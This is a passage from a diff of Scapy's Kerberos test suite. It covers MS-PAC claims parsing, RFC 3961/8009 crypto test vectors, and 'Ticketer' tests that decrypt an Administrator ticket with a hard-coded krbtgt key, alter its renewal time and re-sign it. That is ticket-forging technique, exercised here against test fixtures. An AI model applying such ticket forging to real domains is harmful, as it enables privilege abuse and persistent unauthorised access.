b'\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x02\x00\x03\x00\x03\x00\x01\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00a\x00d\x00:\x00/\x00/\x00e\x00x\x00t\x00/\x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00S\x00i\x00l\x00o\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00T\x000\x00-\x00s\x00i\x00l\x00o\x00\x00\x00' + += MSPAC - Dissect the packet + +claimSet = CLAIMS_SET(bytes(claimSet), ndr64=False) + +assert claimSet.ClaimsArrays.value.value[0].ClaimEntries.value.value[0].Id.value.value[0].value == b'ad://ext/AuthenticationSilo' +assert claimSet.ClaimsArrays.value.value[0].ClaimEntries.value.value[0].Type == 3 +assert claimSet.ClaimsArrays.value.value[0].ClaimEntries.value.value[0].Values.value.ValueCount == 1 +assert claimSet.valueof("ClaimsArrays")[0].valueof("ClaimEntries")[0].valueof("Values").valueof("StringValues")[0] == b'T0-silo' + + ++ Ticketer++ tests +~ mock + +% Same test ccache as kerberos.rst + += Ticketer++ - Load ticketer module + +from scapy.modules.ticketer import * + += Ticketer++ - Write ccache to disk + +from scapy.utils import get_temp_file + +CCACHE_DATA = hex_bytes("0504000c00010008ffffffff0000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000002000000020000000c444f4d41494e2e4c4f43414c000000066b72627467740000000c444f4d41494e2e4c4f43414c0012000000208b4226a190866cbe345ae5e668823edd5359cb00bd479a6428bc8feb1ba55752633332fa633332fa6333bf9a633484770050e100000000000000000000000004486182044430820440a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca382040430820400a003020112a103020102a28203f2048203ee662c2aefcca3f8c78de38e1af1d63b18de011d864d9bec12f3c11e20b0bbdc46e6f5c8311b331b1cc27b23193e90fa47ba7aa6a67fba5826a1f4754ea5050eeab2e07d07a3ec1029b2a11e058ce31e48f4de2bce017e9c2915ee40ffa0f7109597088286fa290fe6ca777465162c5757a67cc53a8e3204846a4ca9cff30c8073d1e9e735b5eb22717f9777c2f38fb13d204952db15e4f160e26535f596f3ce64f9a8d96011718d0405650d7f7c728f87dd2d0e220e4610347faa8a45099b63a351f5adcfccf669d9b6112e31881af869561294a21eb6e2b164b8ce6c6c7b0327ec6c71c23784b06c19030a3f81119f377cb6f0395b5477bffbc5c1a2264ec4af76f4b39a4e2f7030d48c8ebbcaf212036ea0a5abdd5da91fcdc3fb9700d5379f03fbc9fe3a47078dae30b05a418f46ee9ea25f520eb7e67b53d96f7f486e5878b22ea8f4215137a7dcf7f4b6f50463715d9d3c544f294420ed0f7426955fa0a527efce86264f7c29bdfc2cee2c3eb227eb4b7651eb8008e0eb269446a45488296b0427f82b959ad070146cd8a9aed9ef236815bd2149f3f86d73227584f294dc86cf4a77e4eeabf98f4f342dbfc4beb46d834b0c3103d8c5964cad4852eed365ca8e50937e21976122d5cde18c5ab6dd5528c3a680c0a219711766dd5b6a3c103ae65ad5f573a31543a0ebcefde1749062951030f63907cde092010c22c90763248c9f6cd03a6f0a7cb9a7b7441bc7de4c40c1d749373afee597a52c9dbe7533d7ba24a3a26df29474b93643eed97f6b8ffd13976869844841bdd364f2454d6e3ce1ae677ec01c592c25b50e120303240ddaac82dfa9d63b1c42c239b78a6c4ebba2b6458b924931c52b223b9c9cfd6cf0f083e6239e30747f1302de8bde94fe8756b5e0118f5ed61dccc3862ddbc93f103c3160ac15858cbe330420d6e07e2c9f242c2caf8f04d83f3cd71f404c1d56814c9e2aa787763abc295334299487f454e4b4eb5f0e7c3cf5e377374acf827c9fe255e1c7cdb13129ef07c731164ee4eed503f735829a8b7cc2e3718db23d85838fbf7a43861a1c8f890e4c33437b65749946b46f6cff1767158f5684b035f2ea086f7b564f6a57050714b4cad5165b72be6f7a6820b2e9f8936506147e64a77a2f9cf9c13fe4fd59b83191898101068a003e6f7f918006616204ff4b18a9bf495497ba0df0dfcbb89a5e643c60637667357fcf1d97b424240ea75fcf0d26bb159055107f80d1bc682c9057f22a3ef5fb0f50adb30ba975b25069d393bf7eb2522f230912ac1e64bba93c91aa760abb1209bb1313e38dddebcac325d27bef99d66045c09799b71020a44f64bbb59c405449304fd95b8d6bdc6d17e476cba188f30ad04bb6c91d91b028b0953986929a9fb42b21f73028c8ba1f416c70630000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000000000000030000000c582d4341434845434f4e463a000000156b7262355f6363616368655f636f6e665f646174610000000770615f74797065000000206b72627467742f444f4d41494e2e4c4f43414c40444f4d41494e2e4c4f43414c0000000000000000000000000000000000000000000000000000000000000000000000000000013200000000") +KRBTGT = hex_bytes("6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce") + +TICKETER_TEMPFILE = get_temp_file() + +with open(TICKETER_TEMPFILE, "wb") as fd: + fd.write(CCACHE_DATA) + += Ticketer++ - Create and load Ticketer object + +t = Ticketer() +t.open_file(TICKETER_TEMPFILE) + += Ticketer++ - Get ticket 0, change it, resign it and set it back + +# mock the random to get consistency +import mock + +def fake_random(x): + # wow, impressive + return b"0" * x + +with mock.patch('scapy.libs.rfc3961.os.urandom', side_effect=fake_random): + tkt = t.dec_ticket(0, hash=KRBTGT) + assert tkt.renewTill.val == '20220928172927Z' + tkt.renewTill.val = '20220930172927Z' + t.update_ticket(0, tkt, resign=True, hash=KRBTGT, kdc_hash=KRBTGT) + += Ticketer++ - Call show() + +with ContextManagerCaptureOutput() as cmco: + t.show() + outp = cmco.get_output().strip() + +print(outp) + +assert outp == """ +Tickets: +0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + canonicalize+pre-authent+initial+renewable+proxiable+forwardable +Start time End time Renew until Auth time +27/09/22 17:29:30 28/09/22 03:29:30 30/09/22 17:29:27 27/09/22 17:29:30 +""".strip() + += Ticketer++ - Save to disk + +t.save() + += Ticketer++ - Read and check written ccache + +EXPECTED_CCACHE_DATA = hex_bytes("0504000c00010008ffffffff0000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000002000000020000000c444f4d41494e2e4c4f43414c000000066b72627467740000000c444f4d41494e2e4c4f43414c0012000000208b4226a190866cbe345ae5e668823edd5359cb00bd479a6428bc8feb1ba55752633332fa633332fa6333bf9a633727770050e100000000000000000000000004486182044430820440a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca382040430820400a003020112a103020102a28203f2048203eed3d1adb3a09042173463eb0ef195beb666adbaa83193905697db7340daa9fc6cd3450280651effddc129b3761d49569f3c384e450db9ef094b4619d2036126a0b1b44c983e46664ee28cdb8fc33b52d14d2a8357f6c37b31bec5074ee6ee5ab74a896460c767411d0532c6cb69e0da698054ef8f8bf87fb9e8d2d289ec1b22d1ec602ce71c80b98a14aff448374054d4987c0bd13127914a0191d93c3440b5209c4f2190c80d21e064e6f71ab269ab9c0dbf6533e8e29068a3c686b6377d3c79c902818f12a400eabd8f8bb35bce837e9cb0a4413db223bf22e13bee81eb6a4170ae863fd7082db8dac81b70f96c7880c6d5f8350209aa090b75f6343635ba01e9fafdc7700ee84bd9ae0497517ce69b89e44b3933ea3b1a6c36bd38699eba195bb22f0e694b9e952fc187cf7ee5e02b05ec2397e76c217da3c328eeccf5d4ffbe77a765127fc2828e5c8edc1987cb7fbfcfecbb308f4858f711c52ada9c3622dd43d47c29b30630ecf51b9e88cefcf06cb7862922c36a81ae09ec9f62f406f6d4a269cec849a2fe872a16026dce242c775870d827450700c9defdd204342ea1e7d72c5b1c8d92b0318f298898b19a2c705722837c2ff569fc796d55b779950be0db9955d57d349c7d7688b81b9219e376098a2902e23cd01d7bf7734089ab08bc30a7fd2d138aea4454084e3e14d76119e2ef4da6fff3b5758c58efe2904491f6dd57a7eb777aa847783b6ef905c8c796889e6d7e89952a2cef7f99d09405a07b6897291d13eb3a0c4280601b4f4d5cbd00a0125fb87eeb522cd90a8b046163c076a61115e1affe3e362700d984747f1372c92beeb3e1ce4b97ceac032ac8988c536a9594f9032463750f78ca30161e4910d8ff3810d7d4da60d90fded2fcda92a4d6a7b776ba82370130807a30ab0b648f50537453de6c575cc6c98847ae1aa342c3b324005c3988e6cfb161b5b39153cdbd7a305c4cc0949e47197673cd72c29f41f383a7c2b241bd0e70d736f6e342b88128cc38f964588aa32b860dd788a43fb91d4d934401434d6d9e6c622e58a9d99e02331ca642cd9c435305ddbf949751b8c2617489a4cefe376920b7803d493e61d4fdc41f2f6fe50bf5919ede1295eaab25db71aa6e98bbc80a32d7acc24f9cc9b651cb72d22b17031a1d03fd9166c5f488924689aa4859094b42b72c4bf467a1fdb826289bde90035aff2322c68a34b350b0b3b2818c656701b359cbfdb7eb5665439a4deb2cc95bacc358a693f2d0e31975653665fdc468d627c6eee589bbc46bd019a70e394c90529abe646105623c43956c86bf366e4be1f3560b2e4ca01f1e25432618573a9f257890a435e899724eebd9fd271abefeae2f0a55f3abb4619b9ded206bf70ac3b77622d114309e49bb42d01e8c8678765ab4b80000000000000001000000010000000c444f4d41494e2e4c4f43414c0000000d41646d696e6973747261746f7200000000000000030000000c582d4341434845434f4e463a000000156b7262355f6363616368655f636f6e665f646174610000000770615f74797065000000206b72627467742f444f4d41494e2e4c4f43414c40444f4d41494e2e4c4f43414c0000000000000000000000000000000000000000000000000000000000000000000000000000013200000000") + +with open(TICKETER_TEMPFILE, "rb") as fd: + RESULT = fd.read() + +print(RESULT.hex()) + +assert RESULT == EXPECTED_CCACHE_DATA + += Ticketer++ - Import ticket + +TKT = KRB_Ticket(bytes.fromhex("618204b3308204afa003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca38204733082046fa003020112a103020103a28204610482045dbd10c11e1def682dc3607c98db0806acf2809a1f8c73fda44f86c14bd039c4c95a41ed400ac4e558970c51316ffdf34bd695a636bcb1e5074419d083e918085ec56ff77af9f6a410faff3b9859a635184486c83521b5390ec724185057e3e62843a92d9ba500dd24d9ebeff0654fe459cf35d9607b11f7c35bf6ba4dd378fd5c99554650296abcc374c3ff2fcf807038848f351e9134f69726b5e92aec99e4aa99613c35609b0094b533811513e9ba48b9113f0f2b4dbcf9e05a6668c998c09f65ae48c8ea1b7fbc62b5cbbec7decc0a4832df93aec08c138a63621f8c584a8530a380b54b37fdb8dda6924e4260710cf8b66c71479dcb6916790c5c582b9953cab7085178e280d182a74f93fcd3bc83a0dc26284551a4d230a50a8b341de132fdf0f97bb7abdec48021e04c3deda89897c684d5603636bd66842ed4b2586f8e09fbb5e0228bcce3e5ffc82e5674f16a65a4f1b7b17b3854a5465734a5fec573c54526f27b9ea8a64646f01268b040d09f2acda82a37fb195cb24f8c1092919574999fd61d859aed2af5a9457a20a72e6188c0d813cb12713779f84f7bed298e2cd793b06e639d859b4fb3a5f746e2023bcf0627a8a87425899aa3a9b63f558965eccabc35330562b055426e2fc6808c456ee8f047d09a7021b6a4f2547cde6552224b294750efd492ea0745035f76a394d5b6e26442e5542b4d557722ee21b70c05567241ed97dffb31502d950c50462f478fccd8454ec38424688e87c4428c3763b369f1b51509ef36548dcf7a5c842475aa65bec10d6f86cecd90e4694f36d68052b55a2715c00e269c215071311482118ed0168fabb3053ad59dcdf42a42502685cdfcc679d2272dd12ab658ff8588b34cb48b3aef4a1961694ab2b31a812a683015ed343a8c21498997b0ded3767f73e069c9633845b582d6f1a987d6b09d31b330a3cbf2c430fb6f5d6fa27f83d9624b7bb8cebc248933b68dbe1b6b2822b96621159d9249ded893cbedcf1fc5ee77cb69695852170b24ea2f36aa898a24212b2edf84459a4381bd243797b9a3281d7e1b280f6add79dbb1cc5d887178d0813549a168a38be441bb387764098c4e7bed81f7973ee19e733767a4dd05212a18b12c838c674c18b0d6304a28be3de7928ffdd1449d297884c6a6a574b13a0d289425c1ebf37c5af56d04753fcc0c02fdcc98427fb9aa33510905ba2b6746a8b59742e4243f6fba814585b122794a54aecba3ea956a0c85fded2582cb4809ee7be471253f0256503636e81f35df38b177c3c071677e1dd9efa6b10c6a122ab0522f2b10e8b625355f5c1e7996c7055237182691ede31a5e602966f90c2a66bdf997872dbdc97155d723bc1fb187bd0f42cbcdedbe2c5717d13e27e2134ac6cd9d3a53cd215344a8278065da4eea7544860eda5fdb41f849ff7c1db775f7a0a62d2875b43b55bc091e8056666507dfcaded40a83211db7a5856d4c9b5e2ef862830cef8a4c36ce034e9a9e11f558f008cdbe4152081c30dae53b6de44e1703236490cfc87be9e96fa0679f87255069994a262d61d57be0382fe9e570")) + +t = Ticketer() +t.import_krb(TKT, hash=bytes.fromhex("dd4e16dbcfe19d82cb6fc9b593bb7449c1d8a46687dc20c295ed0e51cc4c3d0d")) + +tkt, _, upn, spn = t.export_krb(0) +hexdiff(tkt, TKT) +assert bytes(tkt) == bytes(TKT) +assert upn == 'DC1$@DOMAIN.LOCAL' +assert spn == 'krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL' + ++ Crypto tests + += RFC3691 - Test vectors for KRB-FX-CF2 # https://datatracker.ietf.org/doc/html/rfc6113.html#appendix-A @@ -690,60 +966,60 @@ from scapy.libs.rfc3961 import Key, EncryptionType, KRB_FX_CF2 def test_krb_fx_cf2(etype): k1 = Key.string_to_key(etype, b"key1", b"key1") k2 = Key.string_to_key(etype, b"key2", b"key2") - return bytes_hex(KRB_FX_CF2(k1, k2, b"a", b"b").key) + return KRB_FX_CF2(k1, k2, b"a", b"b").key.hex() -assert test_krb_fx_cf2(EncryptionType.AES128) == b"97df97e4b798b29eb31ed7280287a92a" -assert test_krb_fx_cf2(EncryptionType.AES256) == b"4d6ca4e629785c1f01baf55e2e548566b9617ae3a96868c337cb93b5e72b1c7b" -assert test_krb_fx_cf2(EncryptionType.RC4) == b'24d7f6b6bae4e5c00d2082c5ebab3672' +assert test_krb_fx_cf2(EncryptionType.AES128_CTS_HMAC_SHA1_96) == "97df97e4b798b29eb31ed7280287a92a" +assert test_krb_fx_cf2(EncryptionType.AES256_CTS_HMAC_SHA1_96) == "4d6ca4e629785c1f01baf55e2e548566b9617ae3a96868c337cb93b5e72b1c7b" +assert test_krb_fx_cf2(EncryptionType.RC4_HMAC) == '24d7f6b6bae4e5c00d2082c5ebab3672' -= Test vectors for _n_fold += RFC3691 - Test vectors for _n_fold from scapy.libs.rfc3961 import _n_fold # https://datatracker.ietf.org/doc/html/rfc3961.html#appendix-A.1 -assert bytes_hex(_n_fold(b"012345", 8)) == b"be072631276b1955" -assert bytes_hex(_n_fold(b"password", 7)) == b"78a07b6caf85fa" -assert bytes_hex(_n_fold(b"Rough Consensus, and Running Code", 8)) == b"bb6ed30870b7f0e0" -assert bytes_hex(_n_fold(b"password", 21)) == b"59e4a8ca7c0385c3c37b3f6d2000247cb6e6bd5b3e" -assert bytes_hex(_n_fold(b"MASSACHVSETTS INSTITVTE OF TECHNOLOGY", 24)) == b"db3b0d8f0b061e603282b308a50841229ad798fab9540c1b" -assert bytes_hex(_n_fold(b"Q", 21)) == b"518a54a215a8452a518a54a215a8452a518a54a215" -assert bytes_hex(_n_fold(b"ba", 21)) ==b"fb25d531ae8974499f52fd92ea9857c4ba24cf297e" +assert _n_fold(b"012345", 8).hex() == "be072631276b1955" +assert _n_fold(b"password", 7).hex() == "78a07b6caf85fa" +assert _n_fold(b"Rough Consensus, and Running Code", 8).hex() == "bb6ed30870b7f0e0" +assert _n_fold(b"password", 21).hex() == "59e4a8ca7c0385c3c37b3f6d2000247cb6e6bd5b3e" +assert _n_fold(b"MASSACHVSETTS INSTITVTE OF TECHNOLOGY", 24).hex() == "db3b0d8f0b061e603282b308a50841229ad798fab9540c1b" +assert _n_fold(b"Q", 21).hex() == "518a54a215a8452a518a54a215a8452a518a54a215" +assert _n_fold(b"ba", 21).hex() == "fb25d531ae8974499f52fd92ea9857c4ba24cf297e" -= Test vectors for mit_des_string_to_key += RFC3691 - Test vectors for mit_des_string_to_key # https://datatracker.ietf.org/doc/html/rfc3961.html#appendix-A.2 from scapy.libs.rfc3961 import Key, EncryptionType def _mit_des_string_to_key(text, salt): - k = Key.string_to_key(EncryptionType.DES_MD5, text, salt) - return bytes_hex(k.key) + k = Key.string_to_key(EncryptionType.DES_CBC_MD5, text, salt) + return k.key.hex() -assert _mit_des_string_to_key(b"password", b"ATHENA.MIT.EDUraeburn") == b"cbc22fae235298e3" -assert _mit_des_string_to_key(b"potatoe", b"WHITEHOUSE.GOVdanny") == b"df3d32a74fd92a01" -assert _mit_des_string_to_key((u"\U0001d11e").encode(), b"EXAMPLE.COMpianist") == b"4ffb26bab0cd9413" -assert _mit_des_string_to_key((u"\xdf").encode(), (u"ATHENA.MIT.EDUJuri\u0161i\u0107").encode()) == b"62c81a5232b5e69d" -assert _mit_des_string_to_key(b"11119999", b"AAAAAAAA") == b"984054d0f1a73e31" -assert _mit_des_string_to_key(b"NNNN6666", b"FFFFAAAA") == b"c4bf6b25adf7a4f8" +assert _mit_des_string_to_key(b"password", b"ATHENA.MIT.EDUraeburn") == "cbc22fae235298e3" +assert _mit_des_string_to_key(b"potatoe", b"WHITEHOUSE.GOVdanny") == "df3d32a74fd92a01" +assert _mit_des_string_to_key((u"\U0001d11e").encode(), b"EXAMPLE.COMpianist") == "4ffb26bab0cd9413" +assert _mit_des_string_to_key((u"\xdf").encode(), (u"ATHENA.MIT.EDUJuri\u0161i\u0107").encode()) == "62c81a5232b5e69d" +assert _mit_des_string_to_key(b"11119999", b"AAAAAAAA") == "984054d0f1a73e31" +assert _mit_des_string_to_key(b"NNNN6666", b"FFFFAAAA") == "c4bf6b25adf7a4f8" -= Test vectors for DES3 += RFC3691 - Test vectors for DES3 # https://datatracker.ietf.org/doc/html/rfc3961.html#appendix-A.4 def _des3_string_to_key(text, salt): - k = Key.string_to_key(EncryptionType.DES3, text, salt) - return bytes_hex(k.key) + k = Key.string_to_key(EncryptionType.DES3_CBC_SHA1_KD, text, salt) + return k.key.hex() -assert _des3_string_to_key(b"password", b"ATHENA.MIT.EDUraeburn") == b"850bb51358548cd05e86768c313e3bfef7511937dcf72c3e" -assert _des3_string_to_key(b"potatoe", b"WHITEHOUSE.GOVdanny") == b"dfcd233dd0a43204ea6dc437fb15e061b02979c1f74f377a" -assert _des3_string_to_key(b"penny", b"EXAMPLE.COMbuckaroo") == b"6d2fcdf2d6fbbc3ddcadb5da5710a23489b0d3b69d5d9d4a" -assert _des3_string_to_key((u"\xdf").encode(), (u"ATHENA.MIT.EDUJuri\u0161i\u0107").encode()) == b"16d5a40e1ce3bacb61b9dce00470324c831973a7b952feb0" -assert _des3_string_to_key((u"\U0001d11e").encode(), b"EXAMPLE.COMpianist") == b"85763726585dbc1cce6ec43e1f751f07f1c4cbb098f40b19" +assert _des3_string_to_key(b"password", b"ATHENA.MIT.EDUraeburn") == "850bb51358548cd05e86768c313e3bfef7511937dcf72c3e" +assert _des3_string_to_key(b"potatoe", b"WHITEHOUSE.GOVdanny") == "dfcd233dd0a43204ea6dc437fb15e061b02979c1f74f377a" +assert _des3_string_to_key(b"penny", b"EXAMPLE.COMbuckaroo") == "6d2fcdf2d6fbbc3ddcadb5da5710a23489b0d3b69d5d9d4a" +assert _des3_string_to_key((u"\xdf").encode(), (u"ATHENA.MIT.EDUJuri\u0161i\u0107").encode()) == "16d5a40e1ce3bacb61b9dce00470324c831973a7b952feb0" +assert _des3_string_to_key((u"\U0001d11e").encode(), b"EXAMPLE.COMpianist") == "85763726585dbc1cce6ec43e1f751f07f1c4cbb098f40b19" -= Test vectors for AES += RFC3692 - Test vectors for AES from scapy.libs.rfc3961 import Key, EncryptionType @@ -753,16 +1029,170 @@ from scapy.libs.rfc3961 import Key, EncryptionType # Pass phrase = "password" # Salt = "ATHENA.MIT.EDUraeburn" -k = Key.string_to_key(EncryptionType.AES128, b"password", b"ATHENA.MIT.EDUraeburn", struct.pack(">L", 1200)) -assert bytes_hex(k.key) == b"4c01cd46d632d01e6dbe230a01ed642a" +k = Key.string_to_key(EncryptionType.AES128_CTS_HMAC_SHA1_96, b"password", b"ATHENA.MIT.EDUraeburn", struct.pack(">L", 1200)) +assert k.key.hex() == "4c01cd46d632d01e6dbe230a01ed642a" # Iteration count = 1200 # Pass phrase = (65 characters) # "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # Salt = "pass phrase exceeds block size" -k = Key.string_to_key(EncryptionType.AES256, b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", b"pass phrase exceeds block size", struct.pack(">L", 1200)) -assert bytes_hex(k.key) == b"d78c5c9cb872a8c9dad4697f0bb5b2d21496c82beb2caeda2112fceea057401b" +k = Key.string_to_key(EncryptionType.AES256_CTS_HMAC_SHA1_96, b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", b"pass phrase exceeds block size", struct.pack(">L", 1200)) +assert k.key.hex() == "d78c5c9cb872a8c9dad4697f0bb5b2d21496c82beb2caeda2112fceea057401b" + += RFC8009 - Test vectors for AES-CTS HMAC-SHA2 - Sample results for string-to-key conversion + +from scapy.libs.rfc3961 import Key, EncryptionType + +# https://datatracker.ietf.org/doc/html/rfc8009#appendix-A + +# Iteration count = 32768 +# Pass phrase = "password" +# Salt = 10df9dd783e5bc8acea1730e74355f61 + "ATHENA.MIT.EDUraeburn" + +k = Key.string_to_key(EncryptionType.AES128_CTS_HMAC_SHA256_128, b"password", b"\x10\xdf\x9d\xd7\x83\xe5\xbc\x8a\xce\xa1s\x0et5_aATHENA.MIT.EDUraeburn") +assert k.key.hex() == '089bca48b105ea6ea77ca5d2f39dc5e7' + +# Iteration count = 32768 +# Pass phrase = "password" +# Salt = 10df9dd783e5bc8acea1730e74355f61 + "ATHENA.MIT.EDUraeburn" + +k = Key.string_to_key(EncryptionType.AES256_CTS_HMAC_SHA384_192, b"password", b"\x10\xdf\x9d\xd7\x83\xe5\xbc\x8a\xce\xa1s\x0et5_aATHENA.MIT.EDUraeburn") +assert k.key.hex() == '45bd806dbf6a833a9cffc1c94589a222367a79bc21c413718906e9f578a78467' + += RFC8009 - Test vectors for AES-CTS HMAC-SHA2 - Sample results for key derivation + +# enctype aes128-cts-hmac-sha256-128: +# 128-bit base-key: 3705D96080C17728A0E800EAB6E0D23C + +from scapy.libs.rfc3961 import _AES128CTS_SHA256_128 + +k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=hex_bytes("3705D96080C17728A0E800EAB6E0D23C")) + +# Kc value for key usage 2 (label = 0x0000000299): +kc = _AES128CTS_SHA256_128.derive(k, struct.pack(">IB", 2, 0x99), 128) +assert kc.hex() == 'b31a018a48f54776f403e9a396325dc3' + +# Ke value for key usage 2 (label = 0x00000002AA): +ke = _AES128CTS_SHA256_128.derive(k, struct.pack(">IB", 2, 0xAA), 128) +assert ke.hex() == '9b197dd1e8c5609d6e67c3e37c62c72e' + +# Ki value for key usage 2 (label = 0x0000000255): +ki = _AES128CTS_SHA256_128.derive(k, struct.pack(">IB", 2, 0x55), 128) +assert ki.hex() == '9fda0e56ab2d85e1569a688696c26a6c' + +# enctype aes256-cts-hmac-sha384-192: +# 256-bit base-key: 6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52 + +from scapy.libs.rfc3961 import _AES256CTS_SHA384_192 + +k = Key(EncryptionType.AES256_CTS_HMAC_SHA384_192, key=hex_bytes("6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52")) + +# Kc value for key usage 2 (label = 0x0000000299): +kc = _AES256CTS_SHA384_192.derive(k, struct.pack(">IB", 2, 0x99), 192) +assert kc.hex() == 'ef5718be86cc84963d8bbb5031e9f5c4ba41f28faf69e73d' + +# Ke value for key usage 2 (label = 0x00000002AA): +ke = _AES256CTS_SHA384_192.derive(k, struct.pack(">IB", 2, 0xAA), 256) +assert ke.hex() == '56ab22bee63d82d7bc5227f6773f8ea7a5eb1c825160c38312980c442e5c7e49' + +# Ki value for key usage 2 (label = 0x0000000255): +ki = _AES256CTS_SHA384_192.derive(k, struct.pack(">IB", 2, 0x55), 192) +assert ki.hex() == '69b16514e3cd8e56b82010d5c73012b622c4d00ffc23ed1f' + += RFC8009 - Test vectors for AES-CTS HMAC-SHA2 - Sample encryptions and decryptions + +# enctype aes128-cts-hmac-sha256-128: + +k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=hex_bytes("3705D96080C17728A0E800EAB6E0D23C")) + +# Plaintext: (empty) +# Confounder: 7E5895EAF2672435BAD817F545A37148 + +c = k.encrypt(2, b"", confounder=bytes.fromhex("7E5895EAF2672435BAD817F545A37148")) +assert c.hex() == "ef85fb890bb8472f4dab20394dca781dad877eda39d50c870c0d5a0a8e48c718" +assert k.decrypt(2, c) == b"" + +# Plaintext: 000102030405 +# Confounder: 7BCA285E2FD4130FB55B1A5C83BC5B24 + +c = k.encrypt(2, bytes.fromhex("000102030405"), confounder=bytes.fromhex("7BCA285E2FD4130FB55B1A5C83BC5B24")) +assert c.hex() == "84d7f30754ed987bab0bf3506beb09cfb55402cef7e6877ce99e247e52d16ed4421dfdf8976c" +assert k.decrypt(2, c).hex() == "000102030405".lower() + +# Plaintext: 000102030405060708090A0B0C0D0E0F +# Confounder: 56AB21713FF62C0A1457200F6FA9948F + +c = k.encrypt(2, bytes.fromhex("000102030405060708090A0B0C0D0E0F"), confounder=bytes.fromhex("56AB21713FF62C0A1457200F6FA9948F")) +assert c.hex() == "3517d640f50ddc8ad3628722b3569d2ae07493fa8263254080ea65c1008e8fc295fb4852e7d83e1e7c48c37eebe6b0d3" +assert k.decrypt(2, c).hex() == "000102030405060708090A0B0C0D0E0F".lower() + +# Plaintext: 000102030405060708090A0B0C0D0E0F1011121314 +# Confounder: A7A4E29A4728CE10664FB64E49AD3FAC + +c = k.encrypt(2, bytes.fromhex("000102030405060708090A0B0C0D0E0F1011121314"), confounder=bytes.fromhex("A7A4E29A4728CE10664FB64E49AD3FAC")) +assert c.hex() == "720f73b18d9859cd6ccb4346115cd336c70f58edc0c4437c5573544c31c813bce1e6d072c186b39a413c2f92ca9b8334a287ffcbfc" +assert k.decrypt(2, c).hex() == "000102030405060708090A0B0C0D0E0F1011121314".lower() + +# aes256-cts-hmac-sha384-192: + +k = Key(EncryptionType.AES256_CTS_HMAC_SHA384_192, key=bytes.fromhex("6D404D37FAF79F9DF0D33568D320669800EB4836472EA8A026D16B7182460C52")) + +# Plaintext: (empty) +# Confounder: F764E9FA15C276478B2C7D0C4E5F58E4 + +c = k.encrypt(2, b"", confounder=bytes.fromhex("F764E9FA15C276478B2C7D0C4E5F58E4")) +assert c.hex() == "41f53fa5bfe7026d91faf9be959195a058707273a96a40f0a01960621ac612748b9bbfbe7eb4ce3c" +assert k.decrypt(2, c) == b"" + +# Plaintext: 000102030405 +# Confounder: B80D3251C1F6471494256FFE712D0B9A + +c = k.encrypt(2, bytes.fromhex("000102030405"), confounder=bytes.fromhex("B80D3251C1F6471494256FFE712D0B9A")) +assert c.hex() == "4ed7b37c2bcac8f74f23c1cf07e62bc7b75fb3f637b9f559c7f664f69eab7b6092237526ea0d1f61cb20d69d10f2" +assert k.decrypt(2, c).hex() == "000102030405".lower() + +# Plaintext: 000102030405060708090A0B0C0D0E0F +# Confounder: 53BF8A0D105265D4E276428624CE5E63 + +c = k.encrypt(2, bytes.fromhex("000102030405060708090A0B0C0D0E0F"), confounder=bytes.fromhex("53BF8A0D105265D4E276428624CE5E63")) +assert c.hex() == "bc47ffec7998eb91e8115cf8d19dac4bbbe2e163e87dd37f49beca92027764f68cf51f14d798c2273f35df574d1f932e40c4ff255b36a266" +assert k.decrypt(2, c).hex() == "000102030405060708090A0B0C0D0E0F".lower() + +# Plaintext: 000102030405060708090A0B0C0D0E0F1011121314 +# Confounder: 763E65367E864F02F55153C7E3B58AF1 + +c = k.encrypt(2, bytes.fromhex("000102030405060708090A0B0C0D0E0F1011121314"), confounder=bytes.fromhex("763E65367E864F02F55153C7E3B58AF1")) +assert c.hex() == "40013e2df58e8751957d2878bcd2d6fe101ccfd556cb1eae79db3c3ee86429f2b2a602ac86fef6ecb647d6295fae077a1feb517508d2c16b4192e01f62" +assert k.decrypt(2, c).hex() == "000102030405060708090A0B0C0D0E0F1011121314".lower() + += RFC8009 - Test vectors for AES-CTS HMAC-SHA2 - Sample checksums + +# Checksum type: hmac-sha256-128-aes128 + +k = Key(EncryptionType.AES128_CTS_HMAC_SHA256_128, key=bytes.fromhex("3705D96080C17728A0E800EAB6E0D23C")) +cksum = k.make_checksum(2, bytes.fromhex("000102030405060708090A0B0C0D0E0F1011121314")) +assert cksum.hex() == "d78367186643d67b411cba9139fc1dee" + +# Checksum type: hmac-sha384-192-aes256 + +k = Key(EncryptionType.AES256_CTS_HMAC_SHA384_192, 